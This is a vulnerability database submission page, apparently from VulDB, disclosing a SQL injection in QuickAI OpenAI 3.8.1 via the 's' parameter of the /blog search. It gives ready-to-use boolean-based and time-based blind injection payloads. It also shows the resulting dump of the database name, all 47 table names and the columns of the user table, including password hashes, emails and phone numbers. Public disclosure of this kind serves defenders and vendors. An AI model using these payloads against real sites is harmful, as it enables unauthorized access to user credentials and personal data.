Submit #179194: QuickAI OpenAI 3.8.1 - SQL Injectioninfo

Title	QuickAI OpenAI 3.8.1 - SQL Injection
Description	# Exploit Title: QuickAI OpenAI 3.8.1 - SQL Injection # Date: 07/07/2023 # Exploit Author: skalvin aka (CraCkEr) # Vendor: bylancer # Vendor Homepage: https://bylancer.com/ # Software Link: https://quickai.bylancer.com/ # Version: 3.8.1 # Tested on: Windows 10 Pro # Impact: Database Access Release Notes: SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation. Path: /blog https://website/blog?s=[SQLI] GET parameter 's' is vulnerable to SQL Injection --- Parameter: s (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause Payload: s=123') OR 08039=8039 OR ('04586'='4586 Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (IF - comment) Payload: s=123'XOR(IF(now()=sysdate(),SLEEP(6),0))XOR'Z --- [+] Starting the Attack fetching current database current database: 'quickai_**' fetching tables [47 tables] +----------------------------+ \| qa_faq_entries \| \| qa_text_to_speech_used \| \| qa_user_options \| \| qa_ai_images \| \| qa_logs \| \| qa_orders \| \| qa_adsense \| \| qa_ai_speeches \| \| qa_word_used \| \| qa_ai_templates \| \| qa_blog \| \| qa_api_keys \| \| qa_ai_chat_prompts \| \| qa_blog_comment \| \| qa_subscriber \| \| qa_post_options \| \| qa_admins \| \| qa_transaction \| \| qa_plans \| \| qa_languages \| \| qa_speech_to_text_used \| \| qa_countries \| \| qa_upgrades \| \| qa_ai_template_categories \| \| qa_affiliates \| \| qa_image_used \| \| qa_plan_options \| \| qa_options \| \| qa_blog_categories \| \| qa_prepaid_plans \| \| qa_ai_custom_templates \| \| qa_payments \| \| qa_user \| \| qa_ai_documents \| \| qa_withdrawal \| \| qa_balance \| \| qa_ai_chat_bots \| \| qa_taxes \| \| qa_time_zones \| \| qa_currencies \| \| qa_testimonials \| \| qa_ai_chat \| \| qa_blog_cat_relation \| \| qa_pages \| \| qa_ai_chat_conversations \| \| qa_ai_chat_bots_categories \| \| qa_post \| +----------------------------+ fetching columns for Table: qa_user [49 columns] +----------------+ \| id \| \| group_id \| \| username \| \| user_type \| \| balance \| \| password_hash \| \| forgot \| \| confirm \| \| email \| \| status \| \| view \| \| created_at \| \| updated_at \| \| name \| \| tagline \| \| description \| \| dob \| \| salary_min \| \| salary_max \| \| category \| \| subcategory \| \| website \| \| sex \| \| phone \| \| postcode \| \| address \| \| country \| \| city \| \| city_code \| \| state_code \| \| country_code \| \| image \| \| lastactive \| \| facebook \| \| twitter \| \| googleplus \| \| instagram \| \| linkedin \| \| youtube \| \| oauth_provider \| \| oauth_uid \| \| oauth_link \| \| online \| \| notify \| \| notify_cat \| \| currency \| \| referral_key \| \| referred_by \| \| menu_layout \| +----------------+ [-] Done
User	skalvin (ID 49463)
Submission	07/07/2023 17:59 (11 months ago)
Moderation	07/15/2023 18:20 (8 days later)
Status	Accepted
VulDB Entry	234232

◂ Previous Overview Next ▸

Might our Artificial Intelligence support you?

Check our Alexa App!